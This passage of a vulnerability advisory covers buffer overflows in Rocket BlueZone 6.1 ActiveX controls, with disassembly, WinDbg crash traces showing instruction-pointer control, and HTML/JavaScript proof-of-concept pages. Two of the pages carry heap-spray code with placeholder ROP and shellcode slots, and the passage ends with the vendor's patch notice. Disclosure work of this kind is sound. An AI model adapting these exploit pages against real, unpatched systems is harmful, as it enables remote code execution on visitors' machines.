... /* DISPID=277 */ /* VT_BSTR [8] */ function GetOpenFilename( /* VT_VARIANT [12] [in] */ $FileFilter, <----------------- /* VT_VARIANT [12] [in] */ $FilterIndex, /* VT_VARIANT [12] [in] */ $Title, /* VT_VARIANT [12] [in] */ $ButtonText ) { /* method GetOpenFilename */ } ...
This method suffers of a stack based buffer overflow caused by an overlong FileFilter argument, this is because of a copy loop inside bzwhll.dll. See vulnerable code below.
WinDBG shows: eax=015f0000 ebx=00000000 ecx=0000308c edx=00000041 esi=02c96d64 edi=0321f5b0 eip=031f4883 esp=015ecbf8 ebp=015ecc84 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 bzwhll!DllGetClassObject+0x18dc8: 031f4883 8810 mov byte ptr [eax],dl ds:0023:015f0000=4d 0:008> g (7350.624c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000 eip=41414141 esp=015ec828 ebp=015ec848 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 <Unloaded_oy.dll>+0x41414140: 41414141 ?? ??? vulnerable code, see bzwhll.dll: ;---------------------------------------------------------------------------------------------------- 100247B0 L100247B0: 100247B0 55 push ebp 100247B1 8DAC2404FBFFFF lea ebp,[esp-000004FCh] 100247B8 81EC7C050000 sub esp,0000057Ch 100247BE A1F4EC0410 mov eax,[L1004ECF4] 100247C3 33C5 xor eax,ebp 100247C5 8985F8040000 mov [ebp+000004F8h],eax 100247CB 8B8504050000 mov eax,[ebp+00000504h] 100247D1 53 push ebx 100247D2 56 push esi 100247D3 57 push edi 100247D4 8945D8 mov [ebp-28h],eax 100247D7 8B8548050000 mov eax,[ebp+00000548h] 100247DD 33DB xor ebx,ebx 100247DF 6802010000 push 00000102h 100247E4 8945DC mov [ebp-24h],eax 100247E7 8D85F6030000 lea eax,[ebp+000003F6h] 100247ED 53 push ebx 100247EE 50 push eax 100247EF 66899DF4030000 mov [ebp+000003F4h],bx 100247F6 E891C40000 call jmp_MSVCR80.dll!memset 100247FB BED8DB0310 mov esi,SSZ1003DBD8_All_Files 10024800 8DBDF0020000 lea edi,[ebp+000002F0h] 10024806 A5 movsd 10024807 A5 movsd 10024808 A5 movsd 10024809 68F4000000 push 000000F4h 1002480E 8D8500030000 lea eax,[ebp+00000300h] 10024814 53 push ebx 10024815 50 push eax 10024816 895DE0 mov [ebp-20h],ebx 10024819 A5 movsd 1002481A E86DC40000 call jmp_MSVCR80.dll!memset 1002481F 6802010000 push 00000102h 10024824 8D85EE010000 lea eax,[ebp+000001EEh] 1002482A 53 push ebx 1002482B 50 push eax 1002482C 66899DEC010000 mov [ebp+000001ECh],bx 10024833 E854C40000 call jmp_MSVCR80.dll!memset 10024838 83C424 add esp,00000024h 1002483B 68E8DB0310 push SSZ1003DBE8_Open 10024840 BFB0F50410 mov edi,L1004F5B0 10024845 57 push edi 10024846 FF155C300310 call [KERNEL32.dll!lstrcpyA] 1002484C 6683BD080500000A cmp word ptr [ebp+00000508h],000Ah 10024854 7440 jz L10024896 10024856 66399D08050000 cmp [ebp+00000508h],bx 1002485D 7437 jz L10024896 1002485F 8D8508050000 lea eax,[ebp+00000508h] 10024865 50 push eax 10024866 E8CCEDFEFF call SUB_L10013637 1002486B 59 pop ecx 1002486C 8945D4 mov [ebp-2Ch],eax 1002486F 33C9 xor ecx,ecx 10024871 L10024871: 10024871 8B45D4 mov eax,[ebp-2Ch] \ 10024874 8D3448 lea esi,[eax+ecx*2] | 10024877 8A16 mov dl,[esi] | 10024879 80FA2C cmp dl,2Ch | 1002487C 8D840DF0020000 lea eax,[ebp+ecx+000002F0h] | 10024883 8810 mov [eax],dl | <---------- boom 10024885 7502 jnz L10024889 | 10024887 8818 mov [eax],bl | 10024889 L10024889: | 10024889 41 inc ecx | 1002488A 66391E cmp [esi],bx | 1002488D 75E2 jnz L10024871 / 1002488F 889C0DF1020000 mov [ebp+ecx+000002F1h],bl 10024896 L10024896: 10024896 6683BD180500000A cmp word ptr [ebp+00000518h],000Ah 1002489E 7413 jz L100248B3 100248A0 66399D18050000 cmp [ebp+00000518h],bx 100248A7 740A jz L100248B3 100248A9 0FB68520050000 movzx eax,[ebp+00000520h] 100248B0 8945E0 mov [ebp-20h],eax 100248B3 L100248B3: 100248B3 BE04010000 mov esi,00000104h 100248B8 56 push esi 100248B9 8D85EC010000 lea eax,[ebp+000001ECh] 100248BF 50 push eax 100248C0 8D8528050000 lea eax,[ebp+00000528h] 100248C6 50 push eax 100248C7 E807EEFEFF call SUB_L100136D3 100248CC 56 push esi 100248CD 8D8538050000 lea eax,[ebp+00000538h] 100248D3 57 push edi 100248D4 50 push eax 100248D5 E8F9EDFEFF call SUB_L100136D3 100248DA 83C418 add esp,00000018h 100248DD 8D45CC lea eax,[ebp-34h] 100248E0 50 push eax 100248E1 C745CC08000000 mov dword ptr [ebp-34h],00000008h 100248E8 C745D0FF020000 mov dword ptr [ebp-30h],000002FFh 100248EF FF1550300310 call [COMCTL32.dll!InitCommonControlsEx] 100248F5 6A4C push 0000004Ch 100248F7 5F pop edi 100248F8 57 push edi 100248F9 8D4580 lea eax,[ebp-80h] 100248FC 53 push ebx 100248FD 50 push eax 100248FE E889C30000 call jmp_MSVCR80.dll!memset 10024903 8B45D8 mov eax,[ebp-28h] 10024906 8B806B560000 mov eax,[eax+0000566Bh] 1002490C 894584 mov [ebp-7Ch],eax 1002490F 8D85F0020000 lea eax,[ebp+000002F0h] 10024915 89458C mov [ebp-74h],eax 10024918 8B45E0 mov eax,[ebp-20h] 1002491B 894598 mov [ebp-68h],eax 1002491E 8D85F4030000 lea eax,[ebp+000003F4h] 10024924 89459C mov [ebp-64h],eax 10024927 8D85EC010000 lea eax,[ebp+000001ECh] 1002492D 8945B0 mov [ebp-50h],eax 10024930 83C40C add esp,0000000Ch 10024933 8D4580 lea eax,[ebp-80h] 10024936 50 push eax 10024937 897D80 mov [ebp-80h],edi 1002493A 895D88 mov [ebp-78h],ebx 1002493D 895D90 mov [ebp-70h],ebx 10024940 895D94 mov [ebp-6Ch],ebx 10024943 8975A0 mov [ebp-60h],esi 10024946 895DA4 mov [ebp-5Ch],ebx 10024949 895DA8 mov [ebp-58h],ebx 1002494C 895DAC mov [ebp-54h],ebx 1002494F C745B420100800 mov dword ptr [ebp-4Ch],00081020h 10024956 895DBC mov [ebp-44h],ebx 10024959 895DC0 mov [ebp-40h],ebx 1002495C C745C44E450210 mov dword ptr [ebp-3Ch],L1002454E 10024963 895DC8 mov [ebp-38h],ebx 10024966 FF15E4330310 call [comdlg32.dll!GetOpenFileNameA] 1002496C 85C0 test eax,eax 1002496E 7506 jnz L10024976 10024970 889DF4030000 mov [ebp+000003F4h],bl 10024976 L10024976: 10024976 56 push esi 10024977 8D45E4 lea eax,[ebp-1Ch] 1002497A 50 push eax 1002497B 6AFF push FFFFFFFFh 1002497D 8D85F4030000 lea eax,[ebp+000003F4h] 10024983 50 push eax 10024984 6A01 push 00000001h 10024986 53 push ebx 10024987 FF1554310310 call [KERNEL32.dll!MultiByteToWideChar] 1002498D 8D45E4 lea eax,[ebp-1Ch] 10024990 50 push eax 10024991 FF15A0320310 call [OLEAUT32.dll!OLEAUT32.2] 10024997 8B4DDC mov ecx,[ebp-24h] 1002499A 8901 mov [ecx],eax 1002499C 8B8DF8040000 mov ecx,[ebp+000004F8h] 100249A2 5F pop edi 100249A3 5E pop esi 100249A4 33CD xor ecx,ebp 100249A6 33C0 xor eax,eax 100249A8 5B pop ebx 100249A9 E89EC20000 call SUB_L10030C4C 100249AE 81C5FC040000 add ebp,000004FCh 100249B4 C9 leave 100249B5 C24800 retn 0048h ;----------------------------------------------------------------------------------------------------
Proof of Concept
<html> <object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' /> </object> <script> var x = ""; for (i=0; i<13000; i++){ x = x + "A"; } obj.GetOpenFilename(x,"","",""); </script>
WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll progid: BZWhll.WhllObj.6.1 clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): true Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the GetSaveAsFilename() method, see typelib:
... /* DISPID=276 */ /* VT_BSTR [8] */ function GetSaveAsFilename( /* VT_VARIANT [12] [in] */ $InitialFilename, /* VT_VARIANT [12] [in] */ $FileFilter, <---------------------- /* VT_VARIANT [12] [in] */ $FilterIndex, /* VT_VARIANT [12] [in] */ $Title, /* VT_VARIANT [12] [in] */ $ButtonText ) { /* method GetSaveAsFilename */ } ...
This function suffers of a stack based buffer overflow in the second argument due to a copy loop inside bzwhll.dll, see vulnerable code below.
WinDbg shows: (eec.fd8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=015f0000 ebx=00000000 ecx=0000309c edx=00000041 esi=00000104 edi=0324f5b0 eip=0322467d esp=015ecbe4 ebp=015ecc70 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 bzwhll!DllGetClassObject+0x18bc2: 0322467d 8810 mov byte ptr [eax],dl ds:0023:015f0000=4d 0:008> g (eec.fd8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000 eip=41414141 esp=015ec814 ebp=015ec834 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 <Unloaded_oy.dll>+0x41414140: 41414141 ?? ??? SEH pointers are overwritten, allowing to take control of EIP. vulnerable code, bzwhll.dll: ;---------------------------------------------------------------------------------------------------- 1002458B L1002458B: 1002458B 55 db 55h; 'U' 1002458C 8D db 8Dh; '?' 1002458D AC db ACh; '¿' 1002458E 24 db 24h; '$' 1002458F 00 db 00h; 10024590 FB db FBh; 'ë' 10024591 FF db FFh; 'ï' 10024592 FF db FFh; 'ï' 10024593 81 db 81h; '?' 10024594 EC db ECh; '¬' 10024595 80 db 80h; '?' 10024596 05 db 05h; 10024597 00 db 00h; 10024598 00 db 00h; 10024599 A1 db A1h; 'ö' 1002459A F4EC0410 dd L1004ECF4 1002459E 33 db 33h; '3' 1002459F C5 db C5h; '…' 100245A0 89 db 89h; '%' 100245A1 85 db 85h; ':' 100245A2 FC db FCh; 'ì' 100245A3 04 db 04h; 100245A4 00 db 00h; 100245A5 00 db 00h; 100245A6 8B db 8Bh; '<' 100245A7 85 db 85h; ':' 100245A8 08 db 08h; 100245A9 05 db 05h; 100245AA 00 db 00h; 100245AB 00 db 00h; 100245AC 53 push ebx 100245AD 56 push esi 100245AE 57 push edi 100245AF 8945D8 mov [ebp-28h],eax 100245B2 8B855C050000 mov eax,[ebp+0000055Ch] 100245B8 33DB xor ebx,ebx 100245BA 6802010000 push 00000102h 100245BF 8945E0 mov [ebp-20h],eax 100245C2 8D85FA030000 lea eax,[ebp+000003FAh] 100245C8 53 push ebx 100245C9 50 push eax 100245CA 66899DF8030000 mov [ebp+000003F8h],bx 100245D1 E8B6C60000 call jmp_MSVCR80.dll!memset 100245D6 BED8DB0310 mov esi,SSZ1003DBD8_All_Files 100245DB 8DBDF4020000 lea edi,[ebp+000002F4h] 100245E1 A5 movsd 100245E2 A5 movsd 100245E3 A5 movsd 100245E4 68F4000000 push 000000F4h 100245E9 8D8504030000 lea eax,[ebp+00000304h] 100245EF 53 push ebx 100245F0 50 push eax 100245F1 895DE4 mov [ebp-1Ch],ebx 100245F4 A5 movsd 100245F5 E892C60000 call jmp_MSVCR80.dll!memset 100245FA 6802010000 push 00000102h 100245FF 8D85F2010000 lea eax,[ebp+000001F2h] 10024605 53 push ebx 10024606 50 push eax 10024607 66899DF0010000 mov [ebp+000001F0h],bx 1002460E E879C60000 call jmp_MSVCR80.dll!memset 10024613 83C424 add esp,00000024h 10024616 68D0DB0310 push SSZ1003DBD0_Save 1002461B BFB0F50410 mov edi,L1004F5B0 10024620 57 push edi 10024621 FF155C300310 call [KERNEL32.dll!lstrcpyA] 10024627 BE04010000 mov esi,00000104h 1002462C 56 push esi 1002462D 8D85F8030000 lea eax,[ebp+000003F8h] 10024633 50 push eax 10024634 8D850C050000 lea eax,[ebp+0000050Ch] 1002463A 50 push eax 1002463B E893F0FEFF call SUB_L100136D3 10024640 83C40C add esp,0000000Ch 10024643 6683BD1C0500000A cmp word ptr [ebp+0000051Ch],000Ah 1002464B 7446 jz L10024693 1002464D 66399D1C050000 cmp [ebp+0000051Ch],bx 10024654 743D jz L10024693 10024656 8D851C050000 lea eax,[ebp+0000051Ch] 1002465C 50 push eax 1002465D E8D5EFFEFF call SUB_L10013637 10024662 59 pop ecx 10024663 8945DC mov [ebp-24h],eax 10024666 33C9 xor ecx,ecx 10024668 L10024668: 10024668 8B45DC mov eax,[ebp-24h] \ 1002466B 8D0448 lea eax,[eax+ecx*2] | 1002466E 8A10 mov dl,[eax] | 10024670 80FA2C cmp dl,2Ch | 10024673 8945D4 mov [ebp-2Ch],eax | 10024676 8D840DF4020000 lea eax,[ebp+ecx+000002F4h] | 1002467D 8810 mov [eax],dl | <--------- crash 1002467F 7502 jnz L10024683 | 10024681 8818 mov [eax],bl | 10024683 L10024683: | 10024683 8B45D4 mov eax,[ebp-2Ch] | 10024686 41 inc ecx | 10024687 663918 cmp [eax],bx | 1002468A 75DC jnz L10024668 / 1002468C 889C0DF5020000 mov [ebp+ecx+000002F5h],bl 10024693 L10024693: 10024693 6683BD2C0500000A cmp word ptr [ebp+0000052Ch],000Ah 1002469B 7413 jz L100246B0 1002469D 66399D2C050000 cmp [ebp+0000052Ch],bx 100246A4 740A jz L100246B0 100246A6 0FB68534050000 movzx eax,[ebp+00000534h] 100246AD 8945E4 mov [ebp-1Ch],eax 100246B0 L100246B0: 100246B0 56 push esi 100246B1 8D85F0010000 lea eax,[ebp+000001F0h] 100246B7 50 push eax 100246B8 8D853C050000 lea eax,[ebp+0000053Ch] 100246BE 50 push eax 100246BF E80FF0FEFF call SUB_L100136D3 100246C4 56 push esi 100246C5 8D854C050000 lea eax,[ebp+0000054Ch] 100246CB 57 push edi 100246CC 50 push eax 100246CD E801F0FEFF call SUB_L100136D3 100246D2 83C418 add esp,00000018h 100246D5 8D45CC lea eax,[ebp-34h] 100246D8 50 push eax 100246D9 C745CC08000000 mov dword ptr [ebp-34h],00000008h 100246E0 C745D0FF020000 mov dword ptr [ebp-30h],000002FFh 100246E7 FF1550300310 call [COMCTL32.dll!InitCommonControlsEx] 100246ED 6A4C push 0000004Ch 100246EF 5F pop edi 100246F0 57 push edi 100246F1 8D4580 lea eax,[ebp-80h] 100246F4 53 push ebx 100246F5 50 push eax 100246F6 E891C50000 call jmp_MSVCR80.dll!memset 100246FB 8B45D8 mov eax,[ebp-28h] 100246FE 8B806B560000 mov eax,[eax+0000566Bh] 10024704 894584 mov [ebp-7Ch],eax 10024707 8D85F4020000 lea eax,[ebp+000002F4h] 1002470D 89458C mov [ebp-74h],eax 10024710 8B45E4 mov eax,[ebp-1Ch] 10024713 894598 mov [ebp-68h],eax 10024716 8D85F8030000 lea eax,[ebp+000003F8h] 1002471C 89459C mov [ebp-64h],eax 1002471F 8D85F0010000 lea eax,[ebp+000001F0h] 10024725 8945B0 mov [ebp-50h],eax 10024728 83C40C add esp,0000000Ch 1002472B 8D4580 lea eax,[ebp-80h] 1002472E 50 push eax 1002472F 897D80 mov [ebp-80h],edi 10024732 895D88 mov [ebp-78h],ebx 10024735 895D90 mov [ebp-70h],ebx 10024738 895D94 mov [ebp-6Ch],ebx 1002473B 8975A0 mov [ebp-60h],esi 1002473E 895DA4 mov [ebp-5Ch],ebx 10024741 895DA8 mov [ebp-58h],ebx 10024744 895DAC mov [ebp-54h],ebx 10024747 C745B420000900 mov dword ptr [ebp-4Ch],00090020h 1002474E 895DBC mov [ebp-44h],ebx 10024751 895DC0 mov [ebp-40h],ebx 10024754 C745C44E450210 mov dword ptr [ebp-3Ch],L1002454E 1002475B 895DC8 mov [ebp-38h],ebx 1002475E FF15E0330310 call [comdlg32.dll!GetSaveFileNameA] 10024764 85C0 test eax,eax 10024766 7506 jnz L1002476E 10024768 889DF8030000 mov [ebp+000003F8h],bl 1002476E L1002476E: 1002476E 56 push esi 1002476F 8D45E8 lea eax,[ebp-18h] 10024772 50 push eax 10024773 6AFF push FFFFFFFFh 10024775 8D85F8030000 lea eax,[ebp+000003F8h] 1002477B 50 push eax 1002477C 6A01 push 00000001h 1002477E 53 push ebx 1002477F FF1554310310 call [KERNEL32.dll!MultiByteToWideChar] 10024785 8D45E8 lea eax,[ebp-18h] 10024788 50 push eax 10024789 FF15A0320310 call [OLEAUT32.dll!OLEAUT32.2] 1002478F 8B4DE0 mov ecx,[ebp-20h] 10024792 8901 mov [ecx],eax 10024794 8B8DFC040000 mov ecx,[ebp+000004FCh] 1002479A 5F pop edi 1002479B 5E pop esi 1002479C 33CD xor ecx,ebp 1002479E 33C0 xor eax,eax 100247A0 5B pop ebx 100247A1 E8A6C40000 call SUB_L10030C4C 100247A6 81C500050000 add ebp,00000500h 100247AC C9 leave 100247AD C25800 retn 0058h ;----------------------------------------------------------------------------------------------------
Proof of Concept
<html> <object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' /> </object> <script> var x = ""; for (i=0; i<13000; i++){ x = x + "A"; } obj.GetSaveAsFilename("",x,"","",""); </script>
LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll progid: BlueZone.LIPI.6.1 clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3} implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): True description: LIPI Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the SendFile() method, see typelib:
... /* DISPID=2 */ /* VT_I4 [3] */ function SendFile( /* VT_BSTR [8] [in] */ $__MIDL_0014, <------------------------------ /* VT_BSTR [8] [in] */ $__MIDL_0015 ) { /* method SendFile */ } ...
This method suffers of a heap buffer overflow in the first argument because of an dangerous call to a strcat-like function inside bzlipiobj.dll, see vulnerable code below.
Note that you need to set ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing sendfile.html, WinDBG shows:
eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 <Unloaded_ring.dll>+0xc0c0bfb: 0c0c0c0c 0c0c or al,0Ch vulnerable code, bzlipiobj.dll: ;------------------------------------------------------------------------------- 100200E0 8D8510040000 lea eax,[ebp+00000410h] 100200E6 L100200E6: 100200E6 50 push eax 100200E7 8D83E28E0800 lea eax,[ebx+00088EE2h] 100200ED 50 push eax 100200EE FF15F8610210 call [KERNEL32.dll!lstrcatA] 100200F4 EB75 jmp L1002016B ;-------------------------------------------------------------------------------
to reach the call browse sendfile_crash.html, a login box is showed. Set a breakpoint in memory to KERNEL32.dll!lstrcatA, click OK.
Proof of Concept
<html> <object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' /> </object> <script> //obj.UserName = "aaaaaaaa"; //obj.Password = "bbbbbbbb"; bof = ""; for (i=0; i<15000; i++){ bof = bof + "!!!!"; } obj.SendFile(bof,""); </script>
<html> <body> <object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' /> </object> <div id=blah></div> <script> var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x100; junk = unescape("%u0c0c%u0c0c"); while (junk.length < 0x1000) junk += junk; rop = unescape("%u4141%u4141"); shellcode = unescape("%u4141%u4141"); data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x600; i++) { var x = document.createElement("button"); x.title = data.substring(0,0x40000-0x58); div_container.appendChild(x); } obj.UserName = "aaaaaaaa"; obj.Password = "bbbbbbbb"; bof = ""; for (i=0; i<15000; i++){ bof = bof + "!!!!"; } obj.SendFile(bof,""); </script>
LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll progid: BlueZone.LIPI.6.1 clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3} implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): True description: LIPI Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the ReceiveFile() method, see typelib:
... /* DISPID=1 */ /* VT_I4 [3] */ function ReceiveFile( /* VT_BSTR [8] [in] */ $__MIDL_0011, /* VT_BSTR [8] [in] */ $__MIDL_0012 ) { /* method ReceiveFile */ } ...
This method suffers of a heap buffer overflow in the first argument because of an dangerous call to a strcat-like function inside bzlipiobj.dll, see vulnerable code below.
Note that you need to set ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing receivefile.html, WinDBG shows:
eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 <Unloaded_ring.dll>+0xc0c0bfb: 0c0c0c0c 0c0c or al,0Ch vulnerable code, bzlipiobj.dll: 1001F94D 8D8510040000 lea eax,[ebp+00000410h] 1001F953 L1001F953: 1001F953 50 push eax 1001F954 8D83E28E0800 lea eax,[ebx+00088EE2h] 1001F95A 50 push eax 1001F95B FF15F8610210 call [KERNEL32.dll!lstrcatA] 1001F961 EB75 jmp L1001F9D8
Proof of Concept
<html> <body> <object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' /> </object> <div id=blah></div> <script> var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x100; junk = unescape("%u0c0c%u0c0c"); while (junk.length < 0x1000) junk += junk; rop = unescape("%u4141%u4141"); shellcode = unescape("%u4141%u4141"); data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x600; i++) { var x = document.createElement("button"); x.title = data.substring(0,0x40000-0x58); div_container.appendChild(x); } obj.UserName = "aaaaaaaa"; obj.Password = "bbbbbbbb"; bof = ""; for (i=0; i<15000; i++){ bof = bof + "!!!!"; } obj.ReceiveFile(bof,""); </script>
Vendor Response
The vendor has responded that they have released a patch (2nd of September 2015) and commented that:
In addition to placing the BlueZone announcement on the Rocket Customer Portal, we have added the vulnerability announcement to our website.
You may find the information via this link on our BlueZone product page:
https://www.rocketsoftware.com/product-families/rocket-bluezone-passport
There is also a dedicated page for the announcement if someone does a search for it on the Rocket website:
https://www.rocketsoftware.com/rocket-bluezone-security-annoucement
The patch location is within Rocket’s Customer Portal, and is accessible by all affected customers.
Thanks again for your help and your notification to us.